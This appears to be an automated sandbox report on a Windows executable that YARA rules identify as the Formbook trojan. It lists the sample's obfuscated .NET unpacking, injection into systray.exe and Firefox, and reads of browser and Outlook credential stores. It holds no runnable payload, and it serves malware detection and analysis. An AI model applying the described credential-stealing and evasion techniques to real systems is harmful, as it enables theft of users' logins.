            Source: CMV610942X6UI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: CMV610942X6UI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, uqar9C3iDVsyoPkaSq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, uqar9C3iDVsyoPkaSq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, uqar9C3iDVsyoPkaSq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CMV610942X6UI.exe.logJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\systray.exeFile created: C:\Users\user\AppData\Local\Temp\382-I9W6Jump to behavior
            Source: CMV610942X6UI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: CMV610942X6UI.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: systray.exe, 00000008.00000002.3260476733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3260476733.0000000003506000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1968547818.0000000003506000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3260476733.0000000003511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CMV610942X6UI.exeReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"Jump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CMV610942X6UI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: CMV610942X6UI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: CMV610942X6UI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: systray.pdb source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sxkr.pdbSHA256M source: CMV610942X6UI.exe
            Source: Binary string: systray.pdbGCTL source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sxkr.pdb source: CMV610942X6UI.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkqZZBQxQqm.exe, 00000007.00000000.1716110923.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858183726.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CMV610942X6UI.exe, CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: CMV610942X6UI.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs.Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs.Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs.Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
            Source: CMV610942X6UI.exeStatic PE information: 0xBEB58238 [Sat May 23 00:26:32 2071 UTC]
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040D107 push ebp; iretd 3_2_0040D12B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040CA69 push B786D1BCh; iretd 3_2_0040CA6E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00403340 push eax; ret 3_2_00403342
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040CD74 push ecx; retf 3_2_0040CD75
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00413E5B push edi; retf 3_2_00413E60
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0041DF71 push edx; retf 3_2_0041DF6F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0041DF39 push edx; retf 3_2_0041DF6F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00419FF0 push es; retf 3_2_00419FF1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F4225F pushad ; ret 3_2_00F427F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F427FA pushad ; ret 3_2_00F427F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F4283D push eax; iretd 3_2_00F42858
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F709AD push ecx; mov dword ptr [esp], ecx3_2_00F709B6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F41200 push eax; iretd 3_2_00F41369
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D27FA pushad ; ret 8_2_051D27F9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D225F pushad ; ret 8_2_051D27F9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052009AD push ecx; mov dword ptr [esp], ecx8_2_052009B6
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D283D push eax; iretd 8_2_051D2858
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D1368 push eax; iretd 8_2_051D1369
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0324ABF6 push edx; retf 8_2_0324AC2C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0325089E push ds; iretd 8_2_0325089F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0324AC2E push edx; retf 8_2_0324AC2C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03246CAD push es; retf 8_2_03246CAE
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC95D3 push cs; ret 8_2_04FC9617
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC5563 push ebp; ret 8_2_04FC5564
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC471D push cs; iretd 8_2_04FC4733
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCE2F5 push cs; iretd 8_2_04FCE3B1
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCA28F push ds; iretd 8_2_04FCA29D
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCE359 push cs; iretd 8_2_04FCE3B1
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC6300 push ecx; ret 8_2_04FC6315
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC0CBC pushfd ; iretd 8_2_04FC0CD0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FC0CB2 pushfd ; iretd 8_2_04FC0CD0
            Source: CMV610942X6UI.exeStatic PE information: section name: .text entropy: 7.978260141852589
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, mFb9wARwNwaJe5w7ZV.csHigh entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, QZC8Vgm38RMQqTFC0I.csHigh entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, wdwmQsS8tMhsauNIkb.csHigh entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.csHigh entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, QuvsOJLMp63DVZBfMB.csHigh entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, tHT8CVGRGX12Uy9q6l.csHigh entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, wjHVApHL5aYoBPGjHD.csHigh entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, bPa2QExW5ojMAKvEve.csHigh entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, BxUmT6KabXkxnurDhm.csHigh entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, qLhyZwAOD5LB2Hhnwu.csHigh entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, uqar9C3iDVsyoPkaSq.csHigh entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, tojMPAPIFWIQ7h6ZKOd.csHigh entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, t5ATJRPtXI2sMd8MoI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
